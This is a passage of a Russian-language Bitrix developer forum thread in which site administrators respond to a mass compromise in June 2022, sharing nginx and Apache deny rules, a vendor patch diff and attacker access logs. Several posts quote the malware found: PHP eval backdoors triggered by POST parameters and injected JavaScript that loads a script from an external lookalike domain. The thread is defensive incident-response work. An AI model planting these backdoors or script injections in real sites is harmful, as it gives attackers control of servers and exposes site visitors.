Разработчикам

Взломаны сайты в честь дня конституции украины

RSS

Пользователь 431805

Постоянный посетитель

Сообщений: 58 Баллов: 10 Регистрация: 13.01.2016

#126

29.06.2022 17:46:49

Цитата

написал:
NGINX

# ломает загрузку файлов в ИБ
location /bitrix/tools/upload.php {
if ($request_method = POST ) {
deny all;
}
}

location /bitrix/tools/mail_entry.php {
if ($request_method = POST ) {
deny all;
}
}

location /bitrix/tools/vote/uf.php {
if ($request_method = POST ) {
deny all;
}
}

location /bitrix/tools/html_editor_action.php {
if ($request_method = POST ) {
deny all;
}
}

location /bitrix/admin/site_checker.php {
if ($request_method = POST ) {
deny all;
}
}

у вас nginx какой версии?

попробовал добавить условие про POST, но у меня ошибка, что deny all нельзя размещать в данной секции(условие if)

Пользователь 6397090

Заглянувший

Сообщений: 8 Регистрация: 29.06.2022

#127

29.06.2022 17:53:31

Цитата

написал:

Цитата

Код
nginx version: nginx/1.20.1

Пользователь 6397090

Заглянувший

Сообщений: 8 Регистрация: 29.06.2022

#128

29.06.2022 17:56:04

Цитата

написал:

Цитата

Вот так подключается файл с данными строками.

Прикрепленные файлы

Screenshot_20220629_175426.png (26.38 КБ)

Пользователь 431805

Постоянный посетитель

Сообщений: 58 Баллов: 10 Регистрация: 13.01.2016

#129

29.06.2022 18:12:33

Цитата

написал:

Цитата

написал:

Цитата

Вот так подключается файл с данными строками.

Понял, спасибо, у меня nginx постарее, может из-за этого.

Пользователь 11847

Эксперт

Сообщений: 1141 Баллов: 196 Регистрация: 15.05.2007

#130

29.06.2022 18:29:28

Цитата
написал: Коллеги,собрал информацию из нескольких источников, уточнил в ТП Битрикс.Опубликовал краткую инструкцию как действовать: https://capyba.ru/blog/lechenie-i-zashchita-saytov-bitriks-ot-zarazheniya-06-22/

Правила можно дополнить разрешеннымы адресами (аналогично для всех остальных):
<Files ~ "^(site_checker)\.php$>
Order Deny,Allow
deny from all
# Здесь указать разрешенный адрес или адрес сетки с маской
Allow from XX.XXX.0.0/16
</Files>

www.alfoweb.ru

Пользователь 365135

Заглянувший

Сообщений: 4 Регистрация: 22.08.2015

#131

29.06.2022 19:07:37

Коллеги, у кого появился файл /home/bitrix/www/bitrix/admin/sale_discount_heirlooms.php причем с выполнением агента?

Код
<?php Z647f323e(@$_POST['5cf118']); function Z647f323e($Jc9c9){ @eval($Jc9e8c9); } ?>

Хотя на другом ломаном сайте (сайт разработки полный клон основного, пока оставил не тронутым после атаки) на этом агенте выполнялся /home/bitrix/www/bitrix/admin/posting_brownier.php

С содержимым:

Код
<?php uf5985d(@$_POST['c5a776fd33']); function uf5985d($jb2e2995c){ @eval($jb2e2995c); } ?>

Раньше на этом агенте выполнялось

Код
CCaptchaAgent::DeleteOldCaptcha(3600);

И судя по дате агенты появились 27 июня. Основной сайт восстанавливал из вечернего бекапа от 27 июня.

Пользователь 1641101 Заглянувший Сообщений: 12 Баллов: 1 Регистрация: 27.12.2017	#132 29.06.2022 19:48:52 А про обновления что то слышали? Обновите свои сайты и не будет проблем, обновления не зря выпускают. Эти уязвимости закрыты еще в мае при обновлении.

Пользователь 125280

Посетитель

Сообщений: 28 Баллов: 4 Регистрация: 25.04.2012

#133

30.06.2022 03:16:00

Заглянул в обновление, сами уязвимые файлы в нем не тронуты, значит изменения где-то в другом месте. Может стоит выложить инструкцию где конкретно нужно пофиксить дыру в старых версиях - не всех клиентов получится оперативно обновить, у многих старые сайты с самописным функционалом, который частично отвалится при обновлении. Пофиксить дыру в их случае было бы проще, чем ловить баги на сайтах.

Пользователь 148160

Постоянный посетитель

Сообщений: 62 Баллов: 10 Регистрация: 13.11.2012

#134

30.06.2022 04:12:49

Цитата

написал:
Заглянул в обновление, сами уязвимые файлы в нем не тронуты, значит изменения где-то в другом месте. Может стоит выложить инструкцию где конкретно нужно пофиксить дыру в старых версиях - не всех клиентов получится оперативно обновить, у многих старые сайты с самописным функционалом, который частично отвалится при обновлении. Пофиксить дыру в их случае было бы проще, чем ловить баги на сайтах.

Код

Index: modules/vote/install/version.php
IDEA additional info:
Subsystem: com.intellij.openapi.diff.impl.patch.CharsetEP
<+>UTF-8
===================================================================
diff --git a/modules/vote/install/version.php b/modules/vote/install/version.php
--- a/modules/vote/install/version.php   (revision bed56ff9acf39ae04a93804a19687671562d7c98)
+++ b/modules/vote/install/version.php   (revision 3b4c2d42f4702b73499a7d2c1ab89a091d361159)
@@ -1,6 +1,5 @@
-<?
-$arModuleVersion = array(
-   "VERSION" => "21.0.0",
-   "VERSION_DATE" => "2021-03-09 16:30:00"
-);
-?>
\ No newline at end of file
+<?php
+$arModuleVersion = [
+   'VERSION' => '21.0.100',
+   'VERSION_DATE' => '2022-03-04 09:25:09'
+];
\ No newline at end of file
Index: modules/vote/lib/attachment/connector.php
IDEA additional info:
Subsystem: com.intellij.openapi.diff.impl.patch.CharsetEP
<+>UTF-8
===================================================================
diff --git a/modules/vote/lib/attachment/connector.php b/modules/vote/lib/attachment/connector.php
--- a/modules/vote/lib/attachment/connector.php   (revision bed56ff9acf39ae04a93804a19687671562d7c98)
+++ b/modules/vote/lib/attachment/connector.php   (revision 3b4c2d42f4702b73499a7d2c1ab89a091d361159)
@@ -30,12 +30,13 @@
       }
       $className = str_replace('\\\\', '\\', $attachedObject->getEntityType());
       /** @var \Bitrix\Vote\Attachment\Connector $connector */
+      if (!is_a($className, Connector::class, true))
+      {
+         throw new ObjectNotFoundException('Connector class should be instance of Bitrix\Vote\Attachment\Connector.');
+      }
+
       $connector = new $className($attachedObject->getEntityId());
 
-      if(!$connector instanceof Connector)
-      {
-         throw new ObjectNotFoundException('Connector class should be instance of Connector.');
-      }
       if($connector instanceof Storable)
       {
          $connector->setStorage($attachedObject->getStorage());
Index: modules/vote/lib/uf/manager.php
IDEA additional info:
Subsystem: com.intellij.openapi.diff.impl.patch.CharsetEP
<+>UTF-8
===================================================================
diff --git a/modules/vote/lib/uf/manager.php b/modules/vote/lib/uf/manager.php
--- a/modules/vote/lib/uf/manager.php   (revision bed56ff9acf39ae04a93804a19687671562d7c98)
+++ b/modules/vote/lib/uf/manager.php   (revision 3b4c2d42f4702b73499a7d2c1ab89a091d361159)
@@ -3,6 +3,7 @@
 namespace Bitrix\Vote\Uf;
 
 use Bitrix\Vote\Attach;
+use Bitrix\Vote\Attachment\Connector;
 use Bitrix\Vote\Attachment\DefaultConnector;
 use Bitrix\Vote\Attachment\BlogPostConnector;
 use Bitrix\Vote\Attachment\ForumMessageConnector;
@@ -115,7 +116,7 @@
       $id1 = VoteUserType::NEW_VOTE_PREFIX.$id;
       if(!isset($this->loadedAttachedObjects[$id1]))
       {
-         list($entityType, $moduleId) = $this->getConnectorDataByEntityType($this->params["ENTITY_ID"]);
+         [$entityType, $moduleId] = $this->getConnectorDataByEntityType($this->params["ENTITY_ID"]);
          $attach = \Bitrix\Vote\Attachment\Manager::loadFromVoteId(array(
             "ENTITY_ID" => ($this->params["ENTITY_VALUE_ID"] ?: $this->params["VALUE_ID"]), // http://hg.office.bitrix.ru/repos/modules/rev/b614a075ce64
             "ENTITY_TYPE" => $entityType,
@@ -130,7 +131,7 @@
     */
    public function loadEmptyObject()
    {
-      list($entityType, $moduleId) = $this->getConnectorDataByEntityType($this->params["ENTITY_ID"]);
+      [$entityType, $moduleId] = $this->getConnectorDataByEntityType($this->params["ENTITY_ID"]);
       return \Bitrix\Vote\Attachment\Manager::loadEmptyAttach(array(
          "ENTITY_ID" => ($this->params["ENTITY_VALUE_ID"] ?: $this->params["VALUE_ID"]), // http://hg.office.bitrix.ru/repos/modules/rev/b614a075ce64,
          "ENTITY_TYPE" => $entityType,
@@ -144,7 +145,7 @@
     */
    public function loadFromEntity()
    {
-      list($entityType, $moduleId) = $this->getConnectorDataByEntityType($this->params["ENTITY_ID"]);
+      [$entityType, $moduleId] = $this->getConnectorDataByEntityType($this->params["ENTITY_ID"]);
       $res = array(
          "ENTITY_ID" => ($this->params["ENTITY_VALUE_ID"] ?: $this->params["VALUE_ID"]), // http://hg.office.bitrix.ru/repos/modules/rev/b614a075ce64
          "=ENTITY_TYPE" => $entityType,
@@ -160,7 +161,7 @@
     */
    public function belongsToEntity(Attach $attachedObject, $entityType, $entityId)
    {
-      list($connectorClass, $moduleId) = $this->getConnectorDataByEntityType($entityType);
+      [$connectorClass, $moduleId] = $this->getConnectorDataByEntityType($entityType);
 
       return
          $attachedObject->getEntityId()   == $entityId &&
@@ -257,7 +258,7 @@
                throw new SystemException('Wrong event result by building AdditionalConnectorList. Could not find CLASS.');
             }
 
-            if(is_string($connector['CLASS']) && class_exists($connector['CLASS']))
+            if(is_string($connector['CLASS']) && class_exists($connector['CLASS']) && is_a($connector['CLASS'], Connector::class, true))
             {
                $this->additionalConnectorList[mb_strtolower($connector['ENTITY_TYPE'])] = array(
                   $connector['CLASS'],

Пользователь 11847

Эксперт

Сообщений: 1141 Баллов: 196 Регистрация: 15.05.2007

#135

30.06.2022 04:44:26

Благодарность за выкладку изменений!
Хм, у меня нет такого модуля, а на 2х из 3х сайтах в upload появились какие то лишние файлы. Значит правка только в файлах модуля vote будет не достаточна для закрытия дыры.
P.s. - зачем до сегодняшних проблем было обновлять битрикс, если все работало отлично на небольших информационных сайтах
P.s.P.s. Подумываю о переносе сайтjd с битрикса на что то другое (да хотя бы на WP)

www.alfoweb.ru

Пользователь 431805

Постоянный посетитель

Сообщений: 58 Баллов: 10 Регистрация: 13.01.2016

#136

30.06.2022 09:03:10

только не забываем, что нужно тогда обновляться до php7.4, чтобы работал новый функционал, это если говорить о глобальном обновлении. а , если обновить до php 7.4 сервер, где установлена версия <=20, то отвалится функционал этой версии и надо будет вручную там править файлы. вот такая дилема :-)

,

Ну, из приведенных Вами изменений можно отметить только проверку имени класса - то, что это экземпляр Connector, которая проводится до создания класса. Но, мне кажется, что если это все изменения в vote, то дело было явно не в нем.

Как по мне, то решением невыполнения скриптов в upload является его перенос выше директории, где прописано обрабатывание скриптов(обычно /var/www/Папка_С_Битрикс) и создание символической ссылки @upload в корне сайта на эту директорию.

Пользователь 5722388 Заглянувший Сообщений: 1 Регистрация: 12.11.2021	#137 30.06.2022 10:31:48 Коллеги, видим в журнале событий следующий вариант: Прикрепленные файлы 1656574208338.jpg (301.12 КБ)

Пользователь 5873954 Заглянувший Сообщений: 3 Регистрация: 27.12.2021	#138 30.06.2022 11:06:36 Если обновится, спасает?

Пользователь 104919 Заглянувший Сообщений: 10 Регистрация: 14.03.2012	#139 30.06.2022 11:10:57 Обновления не спасают! После восстановления и обновления, снова вижу новые загруженные файлы в /upload/ и снова появилась ошибка при редактировании юзеров: Crypto is not available

Пользователь 5873954

Заглянувший

Сообщений: 3 Регистрация: 27.12.2021

#140

30.06.2022 11:25:48

Цитата
написал: Обновления не спасают! После восстановления и обновления, снова вижу новые загруженные файлы в /upload/ и снова появилась ошибка при редактировании юзеров: Crypto is not available

Есть варианты решения?

Пользователь 93386

Эксперт

Сообщений: 1119 Баллов: 180 Регистрация: 13.06.2011

#141

30.06.2022 11:28:57

Цитата
написал: После восстановления и обновления, снова вижу новые загруженные файлы в /upload/

посмотрите дату модификации загруженных файлов и найдите в логе Apache примерно в это время запросы.
так поймёте через что опять заливают.
может где-то всё таки бэкдоры имеются ...

Меня ТП Битрикс заверили что платформа последней версии от описанной выше уязвимости полностью защищена...

Пользователь 104919

Заглянувший

Сообщений: 10 Регистрация: 14.03.2012

#142

30.06.2022 11:31:46

Цитата
написал: Есть варианты решения?

ТП битрикса говорит, что это не связано со взломом, нужно только поправить файл /bitrix/.settings.php, внести в него

Скрытый текст
'crypto' => array ( 'value' => array ( 'crypto_key' => 'N0kXnquCZ#FcPB0jgg8ivcLP6y3l4%Q^', ), 'readonly' => true, ),

Но при этом, файлы вида BXTEMP-2022-06-29, BXTEMP-2022-06-30 продолжают создаваться. Хотя уже не создаются вредоносные агенты, и не удаляются инфоблоки.

Пользователь 153705

Постоянный посетитель

Сообщений: 145 Баллов: 30 Регистрация: 18.12.2012

#143

30.06.2022 11:36:09

Цитата
Но при этом, файлы вида BXTEMP-2022-06-29, BXTEMP-2022-06-30 продолжают создаваться. Хотя уже не создаются вредоносные агенты, и не удаляются инфоблоки.

Стандартная процедура самого битрикса такие тоже создаёт, она в них собственно и скачивает обновления.

Пользователь 5873954 Заглянувший Сообщений: 3 Регистрация: 27.12.2021	#144 30.06.2022 12:02:48 У меня на ВДС 3 сайта, один взломали, где не было обновлений (он по сути мне и не нужен был). Могут ли тогда взломать остальные 2?

Пользователь 6395960 Заглянувший Сообщений: 1 Регистрация: 30.06.2022	#145 30.06.2022 12:54:32 Российские учебные заведения поломали 20.06.2022 в 6:40 - 50. Начало приемной комиссии. Нас сломали, и начали ддосить.

Пользователь 140709

Постоянный посетитель

Сообщений: 178 Баллов: 28 Регистрация: 30.08.2012

#146

30.06.2022 22:48:15

Не уверен, связано ли это с взломом от 28 числа, но в системе обнаружились еще 2 бяки:

bitrix/js/main/core/core.js

Код
s=document.createElement(script);s.src=atob(aHR0cHM6Ly9jb2RlLmpxdWVyeS11aWkuY29tL2pxdWVyeS11aS5qcw==);document.head.appendChild(s);

bitrix/modules/main/include/prolog.php

Код
echo "<sc ript src='https://code.jquery-uii.com/jquery-ui.js'></sc ript>";

Рекомендую проверить эти вещи тоже.

????????? ????????

Пользователь 2470299 Заглянувший Сообщений: 4 Регистрация: 21.09.2018	#147 01.07.2022 17:41:42 А не проще, этот модуль удалить, его мало кто вообще использует..

Пользователь 1335277

Заглянувший

Сообщений: 7 Регистрация: 17.08.2017

#148

01.07.2022 19:16:55

Цитата
написал: Рекомендую проверить эти вещи тоже.

Обнаружил такое же сегодня у себя самостоятельно, только вот в чем незадача, файлы были изменены 30.06.2022 в 17:09, а все требующиеся быстрые заплатки я сделал за 5 часов до этого.
Начал смотреть логи, вот такая картинка:

Цитата

185.65.135.173 - - [30/Jun/2022:17:09:45 +0300] "GET / HTTP/1.1" 301 185 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36 Edge/99.0.1150.36"
185.65.135.173 - - [30/Jun/2022:17:09:46 +0300] "GET / HTTP/1.0" 200 40405 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36 Edge/99.0.1150.36"
185.65.135.173 - - [30/Jun/2022:17:09:47 +0300] "GET /bitrix/tools/composite_data.php HTTP/1.0" 200 839 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36 Edge/99.0.1150.36"
185.65.135.173 - - [30/Jun/2022:17:09:47 +0300] "POST /bitrix/tools/html_editor_action.php HTTP/1.0" 403 503 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36 Edge/99.0.1150.36"
185.65.135.173 - - [30/Jun/2022:17:09:48 +0300] "POST /bitrix/tools/html_editor_action.php HTTP/1.0" 403 503 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36 Edge/99.0.1150.36"
185.65.135.173 - - [30/Jun/2022:17:09:48 +0300] "GET /bitrix/components/bitrix/main.file.input/main.php HTTP/1.0" 200 166 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36 Edge/99.0.1150.36"
185.65.135.173 - - [30/Jun/2022:17:09:49 +0300] "GET /bitrix/components/bitrix/main.file.input/main.php HTTP/1.0" 200 190 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36 Edge/99.0.1150.36"
185.65.135.173 - - [30/Jun/2022:17:09:49 +0300] "GET /bitrix/components/bitrix/main.file.input/main.php HTTP/1.0" 200 166 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36 Edge/99.0.1150.36"
185.65.135.173 - - [30/Jun/2022:17:09:50 +0300] "GET /bitrix/components/bitrix/main.file.input/set_list.php HTTP/1.0" 200 168 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)

Обратите внимание запросы к /bitrix/tools/html_editor_action.php уже отдавали 403
/bitrix/components/bitrix/main.file.input/main.php - вываливается в ошибку Notice: Undefined index: HTTP_TEMPLATE
Также интересно что /bitrix/components/bitrix/main.file.input/set_list.php отдает 200, хотя такого файла нет и сейчас этот адрес отдает 404...
Получается что на время операции такой файл был.

Версия 20.0.900

Пользователь 646337

Заглянувший

Сообщений: 1 Регистрация: 18.07.2016

#149

01.07.2022 21:52:42

Код

<?
AddEventHandler("main", "OnBeforeProlog", "CriticalVulnFix", -1);

function CriticalVulnFix()
{
    if (is_array($_FILES) && !empty($_FILES) && !$GLOBALS['USER']->IsAdmin()) {
        $GLOBALS['APPLICATION']->RestartBuffer();
        http_response_code(400);
        exit;
    }
}

Я правильно понял, что дело в загрузке файла и открытие его не понятно каким образом на исполнение php скрипта. Тогда вот костыль что только админ может загружать файл.

Пользователь 6164690

Постоянный посетитель

Сообщений: 82 Баллов: 13 Регистрация: 12.04.2022

#150

01.07.2022 22:27:36

Цитата
написал: Обновите свои сайты и не будет проблем, обновления не зря выпускают.

или соберите нормально
nginx

КАК ОБНОВИТЬ / ПЕРЕСОБРАТЬ NGINX В BITRIXVM СО ВСЕМИ МОДУЛЯМИ ЗА 10 ШАГОВ

читать тут

Взломаны сайты в честь дня конституции украины

Продукты

Управление сайтом

Битрикс24

Интернет-магазин + CRM

Решения

Для интернет-магазинов

Каталог готовых решений

Внедрение

Выбрать партнера

Проверить партнера

Стать партнером